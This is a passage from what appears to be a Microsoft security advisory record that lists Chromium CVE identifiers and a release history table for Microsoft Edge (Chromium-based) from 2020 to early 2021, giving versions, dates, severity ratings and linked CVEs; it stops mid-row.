"CVE-2020-16041", "CVE-2020-6530", "CVE-2020-6481", "CVE-2020-6431", "CVE-2020-6520", "CVE-2020-6411", "CVE-2021-21106", "CVE-2020-6522", "CVE-2019-19880", "CVE-2020-15963", "CVE-2020-6422", "CVE-2020-16040", "CVE-2020-16034", "CVE-2020-15964", "CVE-2020-6400", "CVE-2020-6398", "CVE-2020-6388", "CVE-2020-6413", "CVE-2020-6555", "CVE-2020-6448", "CVE-2020-6426", "CVE-2020-15973", "CVE-2020-16022", "CVE-2020-15987", "CVE-2021-21112", "CVE-2020-15995", "CVE-2020-15971", "CVE-2019-8075", "CVE-2020-6469", "CVE-2020-6512", "CVE-2020-6449", "CVE-2020-15991", "CVE-2020-6435", "CVE-2020-6489", "CVE-2019-18197", "CVE-2020-6456", "CVE-2020-6567", "CVE-2020-16033", "CVE-2020-6514", "CVE-2019-19923", "CVE-2020-6576", "CVE-2020-6473", "CVE-2020-6543", "CVE-2020-16014", "CVE-2020-6415", "CVE-2020-6539", "CVE-2020-6379", "CVE-2020-6466", "CVE-2020-6423", "CVE-2020-16003", "CVE-2020-16006", "CVE-2021-21115", "CVE-2020-16036", "CVE-2020-6515", "CVE-2021-21111", "CVE-2020-6551", "CVE-2020-6575", "CVE-2020-6488", "CVE-2020-6438", "CVE-2020-6552", "CVE-2020-6441", "CVE-2020-6443", "CVE-2020-6513", "CVE-2020-6380", "CVE-2020-6478", "CVE-2020-15977", "CVE-2021-21113", "CVE-2020-6480", "CVE-2020-6487", "CVE-2020-16013", "CVE-2020-6557", "CVE-2020-6556", "CVE-2020-6523", "CVE-2020-6558", "CVE-2020-16038", "CVE-2020-6505", "CVE-2020-16018", "CVE-2020-16025", "CVE-2020-6442", "CVE-2020-16037", "CVE-2021-21110", "CVE-2020-6404", "CVE-2020-6546", "CVE-2020-6526", "CVE-2020-15990", "CVE-2020-16015", "CVE-2020-6436", "CVE-2020-16028", "CVE-2020-6382", "CVE-2020-6490", "CVE-2020-6406", "CVE-2020-6553", "CVE-2020-6433", "CVE-2020-6402", "CVE-2020-6549", "CVE-2020-6418", "CVE-2020-6496", "CVE-2020-15981", "CVE-2020-6516", "CVE-2020-6450", "CVE-2020-6525", "CVE-2020-6562", "CVE-2020-15961", "CVE-2020-6430", "CVE-2020-6425", "CVE-2020-6527", "CVE-2020-0601", "CVE-2020-6541", "CVE-2020-6440", "CVE-2020-6405", "CVE-2020-6517", "CVE-2020-6384", "CVE-2020-6462", "CVE-2020-6378", "CVE-2020-6471", 
"CVE-2020-6393", "CVE-2020-6475", "CVE-2019-20503", "CVE-2020-16017", "CVE-2020-15988", "CVE-2020-6470", "CVE-2020-6524", "CVE-2020-6484", "CVE-2020-6531", "CVE-2020-6510", "CVE-2020-6544", "CVE-2020-6457", "CVE-2020-15992", "CVE-2020-15959", "CVE-2020-6495", "CVE-2020-6509"], "description": "**Please note:** Starting 1/21/2021, we will be releasing the Chrome CVEs that are included in the new releases of Microsoft Edge (Chromium-based) directly in the Security Update Guide. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information.\n\nThis advisory will be updated whenever Microsoft releases a version of Microsoft Edge (Chromium-based) which incorporates publicly disclosed security updates from the Chromium project. Microsoft will document separately any vulnerabilities in Microsoft Edge (Chromium-based), that are not in Chromium, under a Microsoft-assigned CVE number (see, for example: [CVE-2020-1341](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/cve-2020-1341>)).\n\n**History of Microsoft Edge (Chromium-based) Security Updates**\n\nMicrosoft Edge Version | Date Released | Based on Chromium Version | Highest Severity Fix in Release | CVEs \n---|---|---|---|--- \n87.0.664.75 | 1/7/2021 | 87.0.4280.141 | High | [CVE-2021-21106](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21106>), [CVE-2021-21107](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21107>), [CVE-2021-21108](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21108>), [CVE-2021-21109](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21109>), [CVE-2021-21110](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21110>), [CVE-2021-21111](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21111>), [CVE-2021-21112](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21112>), 
[CVE-2021-21113](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21113>), [CVE-2021-21114](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21114>), [CVE-2021-21115](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21115>), [CVE-2021-21116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21116>), [CVE-2020-16043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16043>), [CVE-2020-15995](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15995>) \n87.0.664.57 | 12/7/2020 | 87.0.4280.88 | High | [CVE-2020-16037](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16037>), [CVE-2020-16038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16038>), [CVE-2020-16039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16039>), [CVE-2020-16040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16040>), [CVE-2020-16041](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16041>), [CVE-2020-16042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16042>) \n87.0.664.41 | 11/19/2020 | 87.0.4280.66 for Windows and Linux, 87.0.4280.67 for Mac | High | [CVE-2019-8075](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8075>), [CVE-2020-16012](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16012>), [CVE-2020-16014](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16014>), [CVE-2020-16015](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16015>), [CVE-2020-16018](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16018>), [CVE-2020-16022](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16022>), [CVE-2020-16023](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16023>), [CVE-2020-16024](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16024>), [CVE-2020-16025](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16025>), [CVE-2020-16026](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16026>), 
[CVE-2020-16027](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16027>), [CVE-2020-16028](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16028>), [CVE-2020-16029](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16029>), [CVE-2020-16030](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16030>), [CVE-2020-16031](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16031>), [CVE-2020-16032](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16032>), [CVE-2020-16033](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16033>), [CVE-2020-16034](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16034>), [CVE-2020-16036](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16036>) \n86.0.622.69 | 11/13/2020 | 86.0.4240.198 | High | [**CVE-2020-16013**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16013>) *, [**CVE-2020-16017**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16017>) * \n86.0.622.68 | 11/11/2020 | 86.0.4240.193 | High | [CVE-2020-16016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16016>) \n86.0.622.63 | 11/4/2020 | 86.0.4240.183 | High | [CVE-2020-16004](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16004>), [CVE-2020-16005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16005>), [CVE-2020-16006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16006>), [CVE-2020-16007](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16007>), [CVE-2020-16008](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16008>), [**CVE-2020-16009**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16009>) *, [CVE-2020-16011](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16011>) \n86.0.622.51 | 10/22/2020 | 86.0.4240.111 | High | [**CVE-2020-15999**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15999>) *, [CVE-2020-16000](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16000>), 
[CVE-2020-16001](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16001>), [CVE-2020-16002](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16002>), [CVE-2020-16003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16003>) \n86.0.622.38 | 10/8/2020 | 86.0.4240.75 | High | [CVE-2020-6557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6557>), [CVE-2020-15968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15968>), [CVE-2020-15969](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15969>), [CVE-2020-15971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15971>), [CVE-2020-15972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15972>), [CVE-2020-15973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15973>), [CVE-2020-15974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15974>), [CVE-2020-15975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15975>), [CVE-2020-15977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15977>), [CVE-2020-15979](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15979>), [CVE-2020-15981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15981>), [CVE-2020-15982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15982>), [CVE-2020-15985](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15985>), [CVE-2020-15987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15987>), [CVE-2020-15988](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15988>), [CVE-2020-15989](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15989>), [CVE-2020-15990](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15990>), [CVE-2020-15991](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15991>), [CVE-2020-15992](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15992>) \n85.0.564.63 | 9/23/2020 | 85.0.4183.121 | High | 
[CVE-2020-15960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15960>), [CVE-2020-15961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15961>), [CVE-2020-15962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15962>), [CVE-2020-15963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15963>), [CVE-2020-15964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15964>), [CVE-2020-15965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15965>), [CVE-2020-15966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15966>) \n85.0.564.51 | 9/9/2020 | 85.0.4183.102 | High | [CVE-2020-6574](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6574>), [CVE-2020-6575](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6575>), [CVE-2020-6576](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6576>), [CVE-2020-15959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15959>) \n85.0.564.41 | 8/27/2020 | 85.0.4183.83 | High | [CVE-2020-6558](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6558>), [CVE-2020-6559](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6559>), [CVE-2020-6560](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6560>), [CVE-2020-6561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6561>), [CVE-2020-6562](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6562>), [CVE-2020-6563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6563>), [CVE-2020-6564](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6564>), [CVE-2020-6566](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6566>), [CVE-2020-6567](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6567>), [CVE-2020-6568](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6568>), [CVE-2020-6569](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6569>), [CVE-2020-6570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6570>), 
[CVE-2020-6571](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6571>) \n84.0.522.63 | 8/20/2020 | 84.0.4147.135 | High | [CVE-2020-6556](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6556>) \n84.0.522.59 | 8/11/2020 | 84.0.4147.125 | High | [CVE-2020-6542](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6542>), [CVE-2020-6543](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6543>), [CVE-2020-6544](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6544>), [CVE-2020-6545](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6545>), [CVE-2020-6546](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6546>), [CVE-2020-6547](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6547>), [CVE-2020-6548](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6548>), [CVE-2020-6549](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6549>), [CVE-2020-6550](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6550>), [CVE-2020-6551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6551>), [CVE-2020-6552](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6552>), [CVE-2020-6553](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6553>), [CVE-2020-6554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6554>), [CVE-2020-6555](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6555>) \n84.0.522.49 | 7/30/2020 | 84.0.4147.105 | High | [CVE-2020-6532](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6532>), [CVE-2020-6537](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6537>), [CVE-2020-6538](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6538>), [CVE-2020-6539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6539>), [CVE-2020-6540](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6540>), [CVE-2020-6541](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6541>) \n84.0.522.40 | 7/16/2020 | 84.0.4147.89 | Critical | 
[CVE-2020-6510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6510>), [CVE-2020-6511](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6511>), [CVE-2020-6512](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6512>), [CVE-2020-6513](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6513>), [CVE-2020-6514](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6514>), [CVE-2020-6515](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6515>), [CVE-2020-6516](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6516>), [CVE-2020-6517](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6517>), [CVE-2020-6518](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6518>), [CVE-2020-6519](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6519>), [CVE-2020-6520](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6520>), [CVE-2020-6521](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6521>), [CVE-2020-6522](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6522>), [CVE-2020-6523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6523>), [CVE-2020-6524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6524>), [CVE-2020-6525](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6525>), [CVE-2020-6526](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6526>), [CVE-2020-6527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6527>), [CVE-2020-6528](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6528>), [CVE-2020-6529](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6529>), [CVE-2020-6530](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6530>), [CVE-2020-6531](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6531>), [CVE-2020-6533](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6533>), [CVE-2020-6534](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6534>), 
[CVE-2020-6535](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6535>), [CVE-2020-6536](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6536>) \n83.0.478.56 | 6/24/2020 | 83.0.4103.116 | High | [CVE-2020-6509](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6509>) \n83.0.478.53 | 6/17/2020 | 83.0.4103.106 | High | [CVE-2020-6505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6505>), [CVE-2020-6506](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6506>), [CVE-2020-6507](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6507>) \n83.0.478.45 | 6/4/2020 | 83.0.4103.97 | High | [CVE-2020-6493](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6493>), [CVE-2020-6494](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6494>), [CVE-2020-6495](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6495>), [CVE-2020-6496](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6496>) \n83.0.478.37 | 5/21/2020 | 83.0.4103.61 | High | [CVE-2020-6465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6465>), [CVE-2020-6466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6466>), [CVE-2020-6467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6467>), [CVE-2020-6468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6468>), [CVE-2020-6469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6469>), [CVE-2020-6470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6470>), [CVE-2020-6471](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6471>), [CVE-2020-6472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6472>), [CVE-2020-6473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6473>), [CVE-2020-6474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6474>), [CVE-2020-6475](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6475>), [CVE-2020-6476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6476>), 
[CVE-2020-6478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6478>), [CVE-2020-6479](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6479>), [CVE-2020-6480](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6480>), [CVE-2020-6481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6481>), [CVE-2020-6482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6482>), [CVE-2020-6483](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6483>), [CVE-2020-6484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6484>), [CVE-2020-6486](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6486>), [CVE-2020-6487](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6487>), [CVE-2020-6488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6488>), [CVE-2020-6489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6489>), [CVE-2020-6490](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6490>) \n81.0.416.72 | 5/7/2020 | 81.0.4044.138 | High | [CVE-2020-6831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6831>), [CVE-2020-6464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6464>) \n81.0.416.68 | 4/29/2020 | 81.0.4044.129 | High | [CVE-2020-6461](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6461>), [CVE-2020-6462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6462>) \n81.0.416.64 | 4/23/2020 | 81.0.4044.122 | High | [CVE-2020-6458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6458>), [CVE-2020-6459](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6459>), [CVE-2020-6460](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6460>) \n81.0.416.58 | 4/17/2020 | 81.0.4044.113 | Critical | [CVE-2020-6457](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6457>) \n81.0.416.53 | 4/13/2020 | 81.0.4044.92 | High | [CVE-2020-6454](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6454>), 
[CVE-2020-6423](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6423>), [CVE-2020-6455](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6455>), [CVE-2020-6430](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6430>), [CVE-2020-6456](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6456>), [CVE-2020-6431](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6431>), [CVE-2020-6432](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6432>), [CVE-2020-6433](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6433>), [CVE-2020-6434](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6434>), [CVE-2020-6435](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6435>), [CVE-2020-6436](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6436>), [CVE-2020-6437](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6437>), [CVE-2020-6438](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6438>), [CVE-2020-6439](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6439>), [CVE-2020-6440](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6440>), [CVE-2020-6441](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6441>), [CVE-2020-6442](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6442>), [CVE-2020-6443](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6443>), [CVE-2020-6444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6444>), [CVE-2020-6445](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6445>), [CVE-2020-6446](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6446>), [CVE-2020-6447](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6447>), [CVE-2020-6448](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6448>) \n80.0.361.109 | 4/1/2020 | 80.0.3987.162 | High | [CVE-2020-6450](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6450>), [CVE-2020-6451](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6451>), 
[CVE-2020-6452](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6452>) \n80.0.361.69 | 3/19/2020 | 80.0.3987.149 | High | [CVE-2020-6422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6422>), [CVE-2020-6424](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6424>), [CVE-2020-6425](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6425>), [CVE-2020-6426](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6426>), [CVE-2020-6427](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6427>), [CVE-2020-6428](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6428>), [CVE-2020-6429](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6429>), [CVE-2019-20503](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20503>), [CVE-2020-6449](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6449>) \n80.0.361.66 | 3/4/2020 | 80.0.3987.132 | High | [CVE-2020-6420](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6420>) \n80.0.361.62 | 2/25/2020 | 80.0.3987.122 | High | [CVE-2020-6407](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6407>), [**CVE-2020-6418**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418>) * \n80.0.361.57 | 2/20/2020 | 80.0.3987.116 | High | [CVE-2020-6383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6383>), [CVE-2020-6384](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6384>), [CVE-2020-6386](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6386>) \n80.0.361.48 | 2/7/2020 | 80.0.3987.87 | High | [CVE-2020-6381](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6381>), [CVE-2020-6382](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6382>), [CVE-2019-18197](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18197>), [CVE-2019-19926](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19926>), [CVE-2020-6385](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6385>), 
